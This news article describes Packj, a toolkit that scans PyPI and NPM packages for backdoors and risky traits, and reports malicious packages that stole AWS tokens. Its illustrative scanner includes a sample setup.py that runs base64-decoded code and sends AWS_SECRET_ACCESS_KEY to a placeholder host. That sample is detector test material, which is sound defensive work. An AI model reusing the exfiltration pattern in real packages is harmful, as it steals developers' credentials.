Packj - a toolkit for detecting malicious libraries in Python and JavaScript

The developers of the Packj platform, which performs security audits of libraries, have published an open-source command-line toolkit that lets you identify risky constructs in packages that may be linked to malicious activity or to the presence of vulnerabilities usable to attack the projects that depend on the packages in question ("supply chain"). It supports checking Python and JavaScript packages hosted in the PyPI and NPM directories (support for Ruby and RubyGems is planned for this month). The toolkit's code is written in Python and distributed under the AGPLv3 license.

During an audit of 330 thousand packages with the proposed toolkit, 42 malicious packages containing backdoors and 2,400 risky packages were identified in the PyPI repository. During a check, static code analysis is performed to determine which API features are used, and the package is checked for known vulnerabilities recorded in the OSV database. The MalOSS package is used for the API analysis. The package code is also checked for typical patterns commonly used in malware. These patterns were prepared on the basis of a study of 330 packages with confirmed malicious activity.

It also flags traits and metadata that raise the risk of abuse, such as executing code blocks via "eval" or "exec", generating new code at run time, using obfuscated and hidden code techniques, manipulating environment variables, unintended file access, accessing network resources from install scripts (setup.py), typosquatting (names resembling those of popular libraries), abandoned projects, non-existent maintainer e-mail addresses and websites, and the absence of a public repository with the code.
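The kind of static check described above, shown as an added illustration that is not Packj's own code: an AST walk over an install script that flags dynamic execution, decoder imports, environment reads, install-time network access, and a name close to a popular library. The sample setup.py is constructed, and the list of popular names is an assumption.

```python
import ast
from difflib import SequenceMatcher

# Constructed sample of a suspicious install script (not a real package); it
# combines several of the signals listed above in one short file.
SAMPLE_SETUP_PY = '''
import os, base64, urllib.request
from setuptools import setup
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
urllib.request.urlopen("http://collector.invalid/?t=" + os.environ.get("AWS_SECRET_ACCESS_KEY", ""))
setup(name="requets", version="0.0.1")
'''
DYNAMIC_EXEC = {"eval", "exec", "compile"}
NETWORK_ROOTS = {"urllib", "requests", "socket", "http"}
DECODERS = {"base64", "marshal", "zlib"}
POPULAR_NAMES = ["requests", "urllib3", "numpy", "setuptools"]  # assumed short list

def _dotted(node):
    # Return 'a.b.c' for a Name/Attribute chain, '' for anything else.
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""

def typosquat_candidates(pkg_name):
    # Popular names that the package name closely resembles (similarity >= 0.8).
    return [f"typosquat suspect: {pkg_name!r} resembles {p!r}" for p in POPULAR_NAMES
            if p != pkg_name and SequenceMatcher(None, pkg_name, p).ratio() >= 0.8]

def scan_setup_source(source):
    """Static scan of an install script; returns human-readable findings."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            findings += [f"decoder import: {a.name}" for a in node.names
                         if a.name.split(".")[0] in DECODERS]
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in DYNAMIC_EXEC:
                findings.append(f"dynamic code execution: {name}()")
            elif name.split(".")[0] in NETWORK_ROOTS:
                findings.append(f"network access at install time: {name}()")
            elif name == "setup":
                for kw in node.keywords:
                    if kw.arg == "name" and isinstance(kw.value, ast.Constant):
                        findings += typosquat_candidates(str(kw.value.value))
        elif isinstance(node, ast.Attribute) and _dotted(node) in ("os.environ", "os.getenv"):
            findings.append(f"environment read: {_dotted(node)}")
    return findings
```

Running `scan_setup_source(SAMPLE_SETUP_PY)` yields five findings, one per signal; a plain script that only calls `setup(name='numpy')` yields none.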

In addition, other security researchers have found five malicious packages in the PyPI repository that sent the contents of environment variables to an external server in an attempt to steal AWS tokens and the environment variables of continuous-integration systems: loglib-modules (passed off as a module for the official loglib library), pyg-modules, pygrata and pygrata-utils (passed off as extensions of the legitimate pyg library), and hkg-sol-utils.



Source: opennet.ru